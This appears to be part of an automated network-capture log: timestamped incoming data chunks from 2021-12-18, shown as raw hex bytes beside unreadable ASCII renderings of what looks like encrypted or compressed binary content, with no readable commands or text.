                                                                                                                                  2021-12-18 14:32:00 UTC148INData Raw: 69 78 80 d6 d3 4d cf af 7e c9 4f c5 db 03 a9 67 ff 08 72 5a ed 6f 40 71 6d eb 5e 0e 5d a5 60 60 22 fe cd 1f ad 76 47 14 a8 c1 5d 22 87 10 6b bb 6b ac 21 c7 db d3 7a 22 b3 1e 6d c2 af d6 3b 42 0c db 34 2b c3 ea 19 a9 d8 73 6c f3 dd 2a a7 b2 6c 63 4e 3c c0 4a 52 01 0b 3d 58 4f d5 4b 62 f0 46 5c 92 ad a5 55 55 40 0d ca c1 ac 90 16 9f d9 f9 d6 9b 5a a0 58 a1 9a 48 1e c8 af 9b e3 67 65 23 f7 f5 c9 1d 04 65 67 62 a2 58 93 11 68 4f 3f c0 eb db f1 de 3f c4 5e 62 b2 03 f9 d3 c7 99 c8 8c 98 70 c5 ed 3c 7b 22 4f 77 ac e2 10 32 59 19 bf b9 81 18 87 0c 27 c0 ba 1a a7 67 12 e1 fa dd 0d 56 4b ae 9e 15 75 2f 16 32 2a 09 99 de 9e ed 7d cb 2b 74 bc 1f d0 16 10 2e fe 81 78 ea b6 f6 b9 26 88 a7 77 b6 bb 70 5e f5 bf f7 47 4c 7d 51 f7 f9 27 3e ce ed fd bd e2 e1 6e 74 5f 3d 39
                                                                                                                                  Data Ascii: ixM~OgrZo@qm^]``"vG]"kk!z"m;B4+sl*lcN<JR=XOKbF\UU@ZXHge#egbXhO??^bp<{"Ow2Y'gVKu/2*}+t.x&wp^GL}Q'>nt_=9
                                                                                                                                  2021-12-18 14:32:00 UTC152INData Raw: fa f0 da 0c 4e 06 93 e5 4d 69 46 8e 22 bf fa 9c f8 d3 2b 70 a1 76 10 d3 ae 76 12 d0 c0 36 30 c0 50 d2 e9 11 9b fd 0a a4 6b ca a4 de 07 02 e4 91 ea 46 07 e7 58 6f 89 af 95 e9 dd 91 12 9c 19 79 5a c1 bb 4c d3 4d 7f e7 03 d9 04 64 e0 25 fc a5 17 19 32 2f 74 8e 57 c6 32 e5 bb e9 66 8e 3b 41 73 7e 0d 2c d6 72 0d 6b 81 2d a6 71 b8 f1 1b 6e ed 21 75 fc 5e d7 ef 37 e7 21 55 61 fe 30 c4 16 9c 7a c7 4c 73 27 f3 62 80 ab 66 32 51 fb 83 31 bd 75 d4 70 29 79 ff 4d f9 58 bf f4 5c c0 9e ea ed 3c e4 35 c1 e9 9a cc 6d 26 e0 4b eb 71 06 e6 a1 7c 26 f0 20 64 29 38 6c b0 33 e1 8e ac dc 24 60 6e d1 e4 51 a0 1e b9 a1 9d f9 6c 8f c1 75 7e 18 2d 6a a5 9b 34 96 e3 da 77 73 ea 1c 51 61 a7 7c 36 1f e4 20 07 a2 46 52 bb 77 b8 2b cb e7 5d 86 bf 0d a3 db 13 28 4b 40 89 f4 e2 ce 85 33
                                                                                                                                  Data Ascii: NMiF"+pvv60PkFXoyZLMd%2/tW2f;As~,rk-qn!u^7!Ua0zLs'bf2Q1up)yMX\<5m&Kq|& d)8l3$`nQlu~-j4wsQa|6 FRw+](K@3
                                                                                                                                  2021-12-18 14:32:00 UTC156INData Raw: ea 34 e4 2e 68 cb 00 cf f7 29 fb 7c c2 34 ff 1e 4f 55 c7 54 a9 7e 21 77 63 e5 e7 be e6 92 16 0f 13 25 3b 85 09 c5 67 f6 6a 72 2a c8 98 b6 d8 0c 92 51 88 c7 f5 a5 10 85 b0 d9 68 fe 0a 04 8b 90 e8 27 59 d6 4d 28 5e b8 93 4a 70 9f 2a 13 da ae b1 55 a8 be ef 9c 33 62 b2 1c 25 c9 f5 b0 b5 34 e1 f4 e9 3a 8f 00 6b 68 2e 56 80 6d f0 2f 43 59 85 4e 0a 9a 7f 98 13 a1 a7 af 6b 87 2a ac 67 12 53 99 d5 cf 59 8b 5c 13 90 43 48 7b 8e 5e 55 d1 93 8f a7 1c 6a a9 94 1f e7 e0 f2 c6 5b 4c 04 a4 95 a8 e4 4d 07 8e 42 c3 5b 11 24 da 9f dd ac 9d 2e 55 94 ed e3 7a bf c2 d8 9a c1 53 54 ce 58 1d 1c 39 cb 3a 02 8c b5 e7 3e 93 59 c4 c1 83 93 3d 19 b7 d2 7f 05 fa b1 76 1e d5 d5 ab b9 f9 5c 11 f8 66 b3 19 7e fa 7f dc 7d f4 6d 9d 5c 10 84 0e 89 50 20 63 a5 11 77 9a ba 8b 30 2d ff 28 36
                                                                                                                                  Data Ascii: 4.h)|4OUT~!wc%;gjr*Qh'YM(^Jp*U3b%4:kh.Vm/CYNk*gSY\CH{^Uj[LMB[$.UzSTX9:>Y=v\f~}m\P cw0-(6
                                                                                                                                  2021-12-18 14:32:00 UTC160INData Raw: 3a 0f 04 29 56 33 1a 05 f0 86 04 f1 3a 13 9c cd 57 4d 31 1d 26 98 b8 49 8d a7 a4 37 36 60 5f 95 04 d0 bf ac 7e 65 a6 95 ca 78 e2 f1 a7 f3 70 16 2d a2 ac f7 25 cb 6a 34 81 ca b9 0a a2 17 8d ef 0f 3b 44 5e 23 29 98 e0 73 69 86 31 c8 38 b1 ef 4a 8c 42 3e 33 b6 aa 0f a2 42 99 45 44 ce 5f df 13 12 36 d3 25 fe a0 f0 f7 f1 d3 40 e7 8a 54 a6 19 c4 9b dd e3 18 85 b3 21 de d9 02 e9 8d 19 8f 5e fd 43 ee 37 84 42 72 4e 79 59 b0 c6 df 01 93 3a 30 c8 e0 ea ee b6 80 ca 13 f6 c9 89 98 d5 9b 6e 43 a8 de bf 80 fb bd 8b 4f 27 67 ee 6b 08 a9 04 99 34 b8 50 96 a2 3f 53 33 2c 47 0b ae 62 e3 68 d5 50 df 38 16 c9 66 ff 2e cf ed 3e 2e 29 22 82 df 25 c0 cb b5 db a6 90 27 fb c3 ca 7f c4 ce d4 41 00 5e e5 70 82 8f 6e 4d f3 45 a4 e6 44 3b d7 29 4d ab 69 13 35 07 0b 97 04 ea 4a 63 e2
                                                                                                                                  Data Ascii: :)V3:WM1&I76`_~exp-%j4;D^#)si18JB>3BED_6%@T!^C7BrNyY:0nCO'gk4P?S3,GbhP8f.>.)"%'A^pnMED;)Mi5Jc
                                                                                                                                  2021-12-18 14:32:00 UTC164INData Raw: d2 2b c8 ec 8c 2b fe 1b e8 d9 e2 55 2c 60 cb f5 75 1c 5a 6d ba 02 09 c4 8c f2 61 7a 20 e4 92 63 5a 25 75 ce f0 9e c2 af 46 d3 26 b8 e4 ef d3 dd 06 7d ca a2 9c 63 9f 8f 5c 74 3f 66 54 bc e3 aa ec f7 db 03 75 78 05 38 be da cf cc 72 bd 17 97 13 b4 b1 f2 06 a9 5c fb 7c b7 96 c6 ae 88 da 75 8c f1 cb 0b 19 56 e6 08 39 cd 6f 10 b5 f7 a3 89 0e fb d0 c8 50 85 40 da e6 bc 0c 68 36 a4 0e b4 8f 00 92 95 20 79 d7 4b 43 64 e9 58 47 7c 30 ec ee 8c 17 d5 5c bf f2 00 4e 34 aa 9d 2c 2d 42 09 ad 67 9f f5 0c f3 7e ea ab f5 40 8b fd eb 63 d6 ca 1f b4 74 42 31 20 68 71 20 36 c2 9f 77 33 a3 54 30 b2 39 dc 1a 26 0b cd fb 3c f9 cc 43 8a 55 d8 62 64 ca 75 2b ed df b6 cd 2b 03 f5 35 85 57 f6 3c 8e a2 dd fe ae ff dd 64 0d 3d 84 68 70 99 22 a5 f3 8e c4 68 8c 0d ef a1 d0 5d 47 e0 90
                                                                                                                                  Data Ascii: ++U,`uZmaz cZ%uF&}c\t?fTux8r\|uV9oP@h6 yKCdXG|0\N4,-Bg~@ctB1 hq 6w3T09&<CUbdu++5W<d=hp"h]G
                                                                                                                                  2021-12-18 14:32:00 UTC168INData Raw: b2 47 7e 74 a6 4b 0e 5e 54 75 0e 8c 15 de 8c dd 2b 3c c7 03 65 fc 57 a9 66 56 0b 42 69 83 4a c5 11 8e ad 72 fb 56 b6 c7 19 57 71 b1 23 ec 32 c7 c4 2e c9 7f ca e8 6c 77 46 ed 92 27 ad b0 b3 cc af 07 8e de 3a 21 c5 78 0c b8 dd 3d fd 3f 79 17 8d aa 17 84 b2 fa 8a dc 01 99 37 98 76 90 b6 2d 92 9c 06 ae 3a b5 75 e4 9b a9 08 d3 0e 9c ce 90 64 c2 80 fe 6e 4d b9 7f 91 5c 9e 6a 2f 3a b0 6d 17 f2 06 60 21 99 83 b0 1b e0 b8 29 10 da c3 49 68 90 d6 48 f1 5b de 02 a0 9d 4b ca 10 e3 5a de 9f 17 f7 94 1d 21 1a 32 7c db e5 82 f5 f8 bc 81 86 00 d7 08 e2 dc 4b 0f 41 c2 86 85 09 b5 33 93 32 81 6e 11 63 c9 7c df 06 5a c5 86 35 6d 86 73 42 f0 5b e5 23 70 e6 43 9b ba 0a e6 a8 ed 82 fc 50 ed a1 66 1d 5c ff c4 d8 bf 8b f8 75 d8 8f 55 d2 ac e9 34 d3 bf 8c ed 9f ef 7c f2 d1 48 62
                                                                                                                                  Data Ascii: G~tK^Tu+<eWfVBiJrVWq#2.lwF':!x=?y7v-:udnM\j/:m`!)IhH[KZ!2|KA32nc|Z5msB[#pCPf\uU4|Hb
                                                                                                                                  2021-12-18 14:32:00 UTC172INData Raw: 86 1d 4f 3a e8 c0 9e 29 ca 61 b8 58 46 fa 77 30 7d 42 34 af f8 de 21 88 67 8f ca 31 82 a8 80 27 b5 46 0f 45 a1 9a 84 54 8e 7d e2 b4 33 1e 9b dd 3f a2 d7 47 02 a9 05 c2 aa 3f e0 f4 62 0c bf e8 b1 cf d0 7d 83 93 27 9e 34 4a 82 02 12 27 c1 b4 b4 5c 49 e9 b6 7c e5 f5 0c 57 98 ba b5 72 c6 36 25 12 b3 b0 14 74 a1 77 e4 d5 8e d0 ef 0f 9b 16 e2 6c 60 30 c7 46 bf 1d 26 13 67 3b 7f 19 8d 02 c2 af 0e 0e e6 d4 31 6a e4 5f ad 37 45 35 8c 1e d7 ef 47 f8 b8 48 ea de d9 ed 0b ad 67 7d 89 75 fd f3 03 86 77 02 a2 65 8a f6 dc 9a 81 04 17 b1 e9 ba 4e e7 dc 49 fa b5 d2 89 fe 73 fc 20 e2 2f 27 2c a3 03 79 f5 96 09 44 43 53 31 50 9e f9 1d c0 14 8d ef f7 d3 17 ba e3 b0 31 f5 0b c9 f5 0d 7f 70 1b 35 bd 19 fb 6a 66 0c a4 fb 07 20 5f 3c 0b 02 61 f2 d6 72 e6 fc ec e2 9e 5d 4d 2d 03
                                                                                                                                  Data Ascii: O:)aXFw0}B4!g1'FET}3?G?b}'4J'\I|Wr6%twl`0F&g;1j_7E5GHg}uweNIs /',yDCS1P1p5jf _<ar]M-
                                                                                                                                  2021-12-18 14:32:00 UTC176INData Raw: be d5 fd 6b c2 f4 1f dc f9 5a 3f d2 66 b0 e0 a0 90 d8 cf e8 d8 13 4c d4 36 dd 2b 66 f1 79 27 a1 45 5b a6 3a 89 e1 e5 27 f2 4e eb c0 48 87 34 12 fc a7 e9 4f fc 12 60 d2 48 e2 ef 09 e7 b4 3e 9b fe 68 e2 8f 7f 28 89 fc 46 4f b7 1e 9f 21 74 d0 11 4b ee 19 ea 66 82 ba 4c 2f cc 06 89 d9 13 8b 91 21 0a 78 3b 46 f1 ae 8e 2d 1f 52 9e 16 9a 89 1a ed c2 d0 1c 2c b1 0f 8b 96 da 8b 8d 9f 84 07 ba 30 cb ea a8 f2 e5 3b 5e 3b 42 b7 6c 9a 17 ba 5b 23 8c ab 7d 83 b5 e2 03 e3 7d 90 a9 e6 f3 cf 60 87 6d c5 d1 d9 34 fa 5c a5 9d dc b8 1d d8 51 0b 0b 12 fd 5a e2 d9 e7 c8 eb c4 e8 f1 dd 6a 37 71 9f 85 82 a2 a9 86 e9 0d 54 3d 85 aa f2 21 c0 ce 68 53 47 ca 4e ca 40 52 b0 e9 20 d4 c4 07 aa 88 00 be 69 52 d5 56 61 11 76 e9 f6 16 a2 5d 6e b0 ae 11 09 8b ff 06 f7 55 61 89 c5 2b 7e 65
                                                                                                                                  Data Ascii: kZ?fL6+fy'E[:'NH4O`H>h(FO!tKfL/!x;F-R,0;^;Bl[#}}`m4\QZj7qT=!hSGN@R iRVav]nUa+~e
                                                                                                                                  2021-12-18 14:32:00 UTC180INData Raw: 44 27 9b 2b 07 57 f7 31 e7 aa 2d 74 57 6e 64 e0 2f 59 6d fc 18 da 69 9c 11 47 d4 5d 5b 19 f9 34 04 25 04 c3 24 4c 9d fb b7 17 a3 3a 6e 81 12 9d db 39 3a ab 48 fe c6 5e c6 78 ee 99 72 79 3a 9a bf 02 14 51 c7 4e c9 90 d7 e8 b7 1d 7d ea e5 9a d0 0c 1f c4 12 05 38 56 9f 51 13 09 87 ec 4f 2f dd 37 d2 df dc d9 bf 17 2a 0d ed 45 9c 9b b0 01 63 aa 32 57 0f a6 ee d4 c0 01 ec d3 d5 16 fb 78 dd 87 68 cc 48 c0 e7 08 b7 c4 06 9e d1 df a4 3e 79 dd 13 ad 82 54 55 3c 5f df 51 90 9b d7 c1 11 a1 08 c1 95 c5 3c fa 44 73 23 10 00 f5 96 d0 a6 a8 10 24 61 cc bf c0 e4 be c4 b7 4e 12 b1 39 4a 5b e4 63 af 65 8f 4c 53 a9 a9 ad 84 d7 f5 e7 8f 14 3c 4f 72 01 85 bf 49 7d ad 27 01 b4 e2 e4 cc 49 3e f5 72 06 29 1f 2b 91 98 8b 33 2c 32 d3 af d7 48 ab 97 70 d2 88 bf 95 30 84 e8 7a 3f 16
                                                                                                                                  Data Ascii: D'+W1-tWnd/YmiG][4%$L:n9:H^xry:QN}8VQO/7*Ec2WxhH>yTU<_Q<Ds#$aN9J[ceLS<OrI}'I>r)+3,2Hp0z?
                                                                                                                                  2021-12-18 14:32:00 UTC184INData Raw: 7e c3 8d cb 79 58 63 0c fe e3 43 19 a8 4d fd 73 83 13 c2 ec 17 65 9e dd 77 5c af 41 11 28 93 ec 65 bd 43 62 7e 44 7b 9b d5 60 bc bc c7 50 6d 7d a8 23 9c 10 8c 99 df e9 5b 95 74 ce 93 01 f4 3e 45 ce a4 a7 21 76 6a 6a 8f 1d c6 1f 7d e7 c6 d6 e9 dc 9e 80 94 19 2c 06 6a 5a e6 5e 88 0f ba 1b b3 7f 06 da 9f 89 16 e9 84 6e ae ff bd b7 fa 9f 50 62 fb ab b2 c4 8e ad 29 53 87 41 a4 b4 d2 26 91 d6 3f 11 75 69 3a 5a 22 ba 9d d7 90 09 65 a1 14 8a 4d 4e ed 66 bd 3b 70 5f c6 8b 1d fc 9d 02 fb 98 54 ed 2b 1c ca 40 42 8b eb 51 95 51 fd f4 05 75 6e cd c9 78 6d d7 8d 9e df 4f 17 8d 01 ae 79 bb b9 af 03 d8 a4 d4 95 26 fb 06 d1 a0 91 c8 4a b4 35 a8 ba 54 9e b1 4c 26 8d c2 ba b4 97 8b 4c dd 6f 75 4c cf c1 f1 d9 e5 12 04 bb ad c6 01 26 34 85 c1 6b 39 3e d9 1c 9d 71 64 d1 7b 79
                                                                                                                                  Data Ascii: ~yXcCMsew\A(eCb~D{`Pm}#[t>E!vjj},jZ^nPb)SA&?ui:Z"eMNf;p_T+@BQQunxmOy&J5TL&LouL&4k9>qd{y
                                                                                                                                  2021-12-18 14:32:00 UTC188INData Raw: ce 30 20 4c ce 8e 4d 1b 2c 13 66 46 35 5b b8 f3 2d 97 56 03 c2 b9 45 fd 9d 47 72 35 12 cc 2d f1 f4 7c 71 01 56 16 c6 26 0f b1 af d6 14 e9 16 36 83 69 4c 55 eb da 73 1d 69 0d 89 96 f2 c1 0d 69 42 fc d5 61 a3 0f 0e 8f 9f d9 73 b5 73 8d 71 af 53 c4 1f ae b3 67 1c 45 53 75 58 b7 45 5a 00 7d 3d 68 26 da 6e e8 29 d5 2f bb cd bf 3f 7e 06 d7 83 3c 00 2d f9 26 fe 9e 0e d9 e9 5e e0 9d 39 52 ec 7a 1c 0d 0f a4 d0 f0 fc 5a 46 60 9b 4d 78 58 86 56 5f 59 02 62 43 b3 09 85 20 84 6d 73 8e 92 82 38 c2 3a 55 ef 92 ae a7 03 e5 cc 77 3f 7b 54 4e 98 30 55 98 6c 40 29 96 7c 0b 51 c0 00 de 87 e1 e0 81 50 01 f4 e0 0c 5e 93 1d dc 18 93 7c 37 d5 83 58 35 26 98 46 8c 0d be 94 89 6f 79 c0 68 d7 8a 07 cb 79 a3 79 02 7b 48 82 04 22 56 66 ad 8d 9f 9a ca 3c 23 04 4a ae d1 52 b6 5e 09 f4
                                                                                                                                  Data Ascii: 0 LM,fF5[-VEGr5-|qV&6iLUsiiBassqSgESuXEZ}=h&n)/?~<-&^9RzZF`MxXV_YbC ms8:Uw?{TN0Ul@)|QP^|7X5&Foyhyy{H"Vf<#JR^
                                                                                                                                  2021-12-18 14:32:00 UTC192INData Raw: e0 0a bc 4a 9f 34 d6 83 86 dc af 5e 88 0d 30 0f 81 f8 fc b9 c5 11 e6 18 9b 1c 4b 18 63 cb 65 62 2c a8 20 ce 5b 80 b0 96 27 df 17 82 7e 82 82 d5 b2 d5 fd 33 30 61 fe cc 78 ba 54 af 50 87 fd c8 55 de 9f 9c 3c 64 7e 56 11 be c5 25 39 01 21 08 d3 50 2c 3d 3e f6 61 95 95 f1 19 6e 3e 97 c8 e2 00 54 ea 77 33 ed bf d2 f0 74 2c 18 03 35 95 d0 fe 5b 16 04 c9 d8 c1 35 7d 3e 39 30 e3 a4 bc 79 21 c9 21 b3 92 16 d7 95 64 8b 95 9d b8 32 5c 0e 92 ee 35 6d be fd 57 e9 41 69 1a b7 e3 35 b5 cd 93 c3 f2 02 73 2f 58 e8 a1 cb 71 59 5a 17 84 9e a9 15 67 04 87 72 cf 65 c8 63 94 cf f0 47 76 80 cc 3a dd d8 78 71 d9 b9 2e d2 ee 56 26 94 d4 92 60 87 57 91 8d 4b 6d 8a 2e 21 b9 09 90 b2 e0 23 36 d8 0a 7c cf 6d 94 f0 14 37 b1 5f 4f 90 be 85 05 f3 29 4c 5a 9b 87 b0 f0 2b 5c 81 4c 08 22
                                                                                                                                  Data Ascii: J4^0Kceb, ['~30axTPU<d~V%9!P,=>an>Tw3t,5[5}>90y!!d2\5mWAi5s/XqYZgrecGv:xq.V&`WKm.!#6|m7_O)LZ+\L"
                                                                                                                                  2021-12-18 14:32:00 UTC196INData Raw: a7 23 bd 1c ca e9 6f 49 43 e0 20 7f 4a f6 1f 5a 38 4a d7 ca 8a d5 19 57 ac 35 7c a8 20 45 bf 19 6c 91 f7 26 3d 4f 13 f2 5e 90 f7 6f ac b5 25 0a f5 ed 9e 83 92 fb 8c 6b cf 32 83 97 b0 a9 f2 1d 7d e3 3d 1d 23 01 64 6f 1e ca 42 88 6d bf f9 d6 d5 c0 f1 d2 4e 2b b8 39 03 2b f2 93 69 6d 71 58 53 a6 32 8f 97 cb 2b d6 f5 14 24 11 11 da 53 83 2e 76 53 dd 4e 18 99 74 01 4b 5c 73 5e 5f a8 64 0a 24 07 8b 15 90 7c 66 5c 70 26 a7 48 01 d9 e3 3d e2 64 ac 78 e0 41 a1 29 55 ff b4 b6 72 f8 9c 81 85 54 5e 4b a2 7b 43 df a0 f8 9c 81 ad bd 20 29 36 f5 50 f8 11 3c fe 8d 4b 2e dc e2 2b c8 79 15 62 9a e6 51 bf bc 16 ed db 08 c0 cd 16 0d 32 42 d2 46 a7 42 d3 3c a3 7e f3 2b f3 4b 20 ce d1 a5 b0 aa 06 c0 fd 64 92 bb 71 9f ea 13 90 76 5e fb 11 62 ba 3f 65 c6 a9 0f 70 d8 18 8a 2f 5c
                                                                                                                                  Data Ascii: #oIC JZ8JW5| El&=O^o%k2}=#doBmN+9+imqXS2+$S.vSNtK\s^_d$|f\p&H=dxA)UrT^K{C )6P<K.+ybQ2BFB<~+K dqv^b?ep/\
                                                                                                                                  2021-12-18 14:32:00 UTC200INData Raw: 52 d4 1f c7 d9 f2 7e 2a 48 96 9b b8 9d 02 7a 53 54 29 e6 59 21 9e 76 58 80 24 b3 f1 76 19 d9 a4 65 68 36 6b 23 13 7a 37 eb 54 0d e4 b7 df c6 b2 37 59 76 c6 20 40 0c 91 d4 c8 47 ee 0e 34 81 9b 9b 4b e1 84 83 14 03 a2 44 f6 eb 68 ae 91 57 9b 31 85 6e 53 13 4c 83 32 9a 5c fe 2a 07 63 fe 9f cd 57 61 1b 44 aa ad 5e dd ac a5 4f 26 2a 96 2e 5d 03 5e 44 39 38 e0 13 c1 7b 28 b8 8a e6 fa ec b2 6d 04 f0 50 ae f6 37 a3 84 c9 24 30 59 32 a2 5f a2 c7 85 44 69 f1 b0 ea e4 d8 4c 23 14 ce 22 1a b8 62 9f b2 3c 71 12 8b bf d1 86 1f 9f da 93 ed a3 2a 90 d1 d0 79 1b 45 0e ae d3 69 60 7c fa fa 39 71 52 96 19 26 f1 8a 30 d3 e6 2b ae 49 eb 58 27 a2 08 4c 75 b6 5c 92 23 f7 68 66 ff 27 12 88 c8 3f 6e e2 11 7a 5d fa 0e ea 41 ec 65 84 19 97 db ee cf 44 3d 17 1b 62 d2 14 f4 50 5a 13
                                                                                                                                  Data Ascii: R~*HzST)Y!vX$veh6k#z7T7Yv @G4KDhW1nSL2\*cWaD^O&*.]^D98{(mP7$0Y2_DiL#"b<q*yEi`|9qR&0+IX'Lu\#hf'?nz]AeD=bPZ
                                                                                                                                  2021-12-18 14:32:00 UTC204INData Raw: 7c 14 f0 21 c4 7a c4 d9 6d db 69 d0 ad 8a 79 32 e1 c4 13 47 f9 b9 01 f3 cc b9 c7 14 81 46 59 f9 f9 42 ea 4b b0 6f 75 f1 3b 2b 80 4c 93 2b 55 ba 95 10 f3 2b 0f 43 57 a2 33 bd 90 d5 32 5d 92 24 9b 16 1f 25 58 37 d0 62 76 24 55 58 6d 66 60 19 22 e2 d3 28 22 3d c7 50 96 29 48 3e 5b 52 97 4d e6 7d 7b d0 58 f1 fd be 5d 9a 07 cb f7 7d 65 cb b4 18 87 45 7e d7 fa 2c 42 b1 c8 ec 4c af c0 87 f8 ea cb 64 a5 ef 54 5f f2 73 78 e9 62 31 e7 50 4f 47 29 c2 4f ad 34 64 a5 ca 76 49 95 7b cc 78 ef 76 ed 9a 0b 8a df e0 db 5e da 2a c7 73 d7 5e 67 2e 1c df d1 86 fb f5 a1 85 4b cd a3 49 b2 93 23 99 73 7b 71 b5 f8 d2 27 5f aa 0b 7d b2 30 0e 3f 8b 0d 4f 42 07 cd 17 68 34 df 83 38 dc cd 2e 04 22 c9 2e 77 98 96 3a 2e 37 1e 70 49 37 48 09 d8 a3 64 ed 85 14 34 e5 17 b8 c1 23 b8 b1 4a
                                                                                                                                  Data Ascii: |!zmiy2GFYBKou;+L+U+CW32]$%X7bv$UXmf`"("=P)H>[RM}{X]}eE~,BLdT_sxb1POG)O4dvI{xv^*s^g.KI#s{q'_}0?OBh48.".w:.7pI7Hd4#J
                                                                                                                                  2021-12-18 14:32:00 UTC208INData Raw: 61 68 28 8a 08 7b 3a 43 75 d9 bc ed 48 ea cf 99 de 0f 5f b2 d5 e9 b2 52 96 63 db d4 9e 7b b4 9d 9e 0d 42 c0 f6 98 5d 1d 03 dc 7c 64 0b cb 75 45 52 e6 d5 c7 5a e9 4e 76 05 7d de 74 0d 2e f7 f5 2b a9 8a a1 00 f7 f5 df 0d 0c 2e c0 c8 cf 5f 6d 0f a0 42 e1 0e 0e b5 eb c9 40 aa 29 ba 46 7a f2 88 0b 03 93 af d6 5c c8 95 28 e1 b2 20 b8 8e ff a2 52 04 22 d4 fc a8 29 58 75 39 91 48 9a 2c 58 44 e4 b3 78 a3 29 e6 38 e3 ae c5 33 1d 30 2a 91 ca 61 ce 01 6a ad d8 86 1d 76 eb de 08 27 4e 5b 0a e0 8f 88 15 c8 bf de f8 cb f7 29 1d 3c ce c1 af 2e 98 68 ab f1 48 bd da 06 eb 3f 8c e6 13 00 91 ee 96 31 9d f4 80 c2 b5 1d f0 6b 40 f7 d8 17 3a e7 e4 57 2e f8 f0 19 6f 83 9c 5b f9 cb cc 63 07 7d 59 af 3a a3 09 80 3b 86 0a 71 be d0 08 f8 ce c6 33 f9 34 92 95 56 2a e1 c7 13 59 98 19
                                                                                                                                  Data Ascii: ah({:CuH_Rc{B]|duERZNv}t.+._mB@)Fz\( R")Xu9H,XDx)830*ajv'N[)<.hH?1k@:W.o[c}Y:;q34V*Y
                                                                                                                                  2021-12-18 14:32:00 UTC212INData Raw: ad 93 b4 f5 ad 14 87 4a f7 5d eb 94 11 8c b3 6e e0 b2 0a 79 e9 52 70 e8 a9 49 d0 35 2a 8f 85 04 db d4 9e 1d 17 65 ed 0c 98 25 2e 90 7d e4 9f b4 fb a4 4f 3d a3 68 75 17 8d 2b 7c e9 a6 85 d2 f5 82 93 7b 31 d9 cb 94 e8 2b 7c 60 92 a2 2a a8 cf f9 62 a5 16 96 72 95 97 d9 44 e7 05 56 62 77 be ae 82 8c 7b 10 38 53 05 af 25 ce 76 45 27 5a b1 e1 f3 aa 1d 70 6c ee 62 81 f3 50 58 d1 09 65 53 92 6e 5d c8 55 e9 65 44 62 08 fe b7 eb 7a 1f 7a 7c 55 49 08 6f b4 b8 a2 91 3b d9 d8 77 38 bb 59 54 3d 77 c9 33 1d b9 2f 2f 16 7a 96 85 1c d4 1f 8a 4f b5 da e2 3f 30 50 3e 4c 22 02 10 23 e8 cf be 83 e2 d7 3c b8 7b 27 c3 55 b0 83 07 56 48 6b a2 69 d2 2c c8 58 22 e9 d5 7a 54 74 f9 1f 6f 25 3a ac d1 41 72 d1 7c 02 7e 20 72 89 ce d4 f6 e4 2d 1e e6 6d f6 04 d3 66 ec e4 e5 d8 eb 13 dd
                                                                                                                                  Data Ascii: J]nyRpI5*e%.}O=hu+|{1+|`*brDVbw{8S%vE'ZplbPXeSn]UeDbzz|UIo;w8YT=w3//zO?0P>L"#<{'UVHki,X"zTto%:Ar|~ r-mf
                                                                                                                                  2021-12-18 14:32:00 UTC224INData Raw: 98 11 4b 54 55 60 c2 ee e0 b0 79 27 5c 5c 59 40 90 9e 45 5a 16 0f 27 db 38 8d b6 fc 38 3a 6d d2 05 c8 70 39 ae ee df d0 b7 6d db 6a d1 ab 85 4f 9a f6 15 53 68 a9 37 05 77 61 33 4a 0f a7 7a 5e 7d b7 5d 52 0e 30 27 a0 e0 65 0e 3c c4 07 ef 58 fb 04 d4 3e d4 e8 d4 f5 f4 a7 9c f9 da 2a 16 0f 13 0d ed 0b ab 57 d9 b2 5c 09 a0 d0 34 c3 88 1b 77 c4 e4 4a ef 13 be a9 fa e4 4a 27 f6 76 bf 68 7c 38 06 31 24 a2 70 0d 94 2c 4d 79 68 3e d4 6c d8 e9 f5 62 05 57 5b 7f 52 85 50 70 3f cc 67 d3 f7 c4 53 a6 01 19 5f 2c bb 32 a5 5f e8 07 6f 90 10 5d 62 16 98 b8 c9 fd ce a3 5a 25 4d 6f 36 94 aa 57 8d c6 a3 b5 de 9b 55 54 65 1b 44 3c 7b 18 28 1c 69 f2 8d 9a 6a 78 73 cc 46 0f da 5e a4 fe 6c b6 1a f8 8c c7 ee 91 6e b7 8b 85 1e bb 9d 29 ee ad 67 74 2b 30 0d 9e 98 72 33 0e 7f 19 77
                                                                                                                                  Data Ascii: KTU`y'\\Y@EZ'88:mp9mjOSh7wa3Jz^}]R0'e<X>*W\4wJJ'vh|81$p,Myh>lbW[RPp?gS_,2_o]bZ%Mo6WUTeD<{(ijxsF^ln)gt+0r3w
                                                                                                                                  2021-12-18 14:32:00 UTC224INData Raw: f0 02 20 6d bb 98 0b 92 48 e7 0d 88 6b 7d 35 6c 74 15 93 ab f8 2d 57 e7 5e d7 b3 85 10 f5 4a 91 de 33 6e 43 c4 db 8b 8f 50 64 64 ac 80 ad 67 ca b0 5b 50 e2 45 75 71 b1 f7 5d fd ba 5b 1f 06 32 96 00 84 40 06 f2 16 c4 51 c7 32 23 cc 4f 0e 22 de af 8f 0f 26 fd 5a 94 dc 0a 9f df 08 68 3f 17 dc d9 c1 21 35 16 9c 71 16 bd 84 0c 62 57 10 15 f2 d2 f4 32 7d da 4b f7 26 40 77 27 23 3d 41 55 26 0e cd d8 77 8a 9a 3e 20 2d e9 4b 99 c6 cb f7 9b 4e d8 29 bc cc fe 10 16 95 ca 78 80 94 3f bd 87 bd 30 8f 29 02 f8 7a ec 45 33 ae 0b b1 87 7e 2c 71 17 c4 c4 c8 e7 6a a9 37 2a f9 55 88 13 ab 25 ad 3d ea 0f 1a fb ac c6 bc 1d 15 4d 63 18 fd 99 87 95 f1 ab 30 a3 a7 99 49 99 cd 58 84 71 92 e7 92 47 98 da 4d 98 68 51 0b 1d 06 20 f1 22 c3 2a 21 34 57 2e ac 64 1e a5 1d 1a 10 90 b7 25
                                                                                                                                  Data Ascii: mHk}5lt-W^J3nCPddg[PEuq][2@Q2#O"&Zh?!5qbW2}K&@w'#=AU&w> -KN)x?0)zE3~,qj7*U%=Mc0IXqGMhQ "*!4W.d%
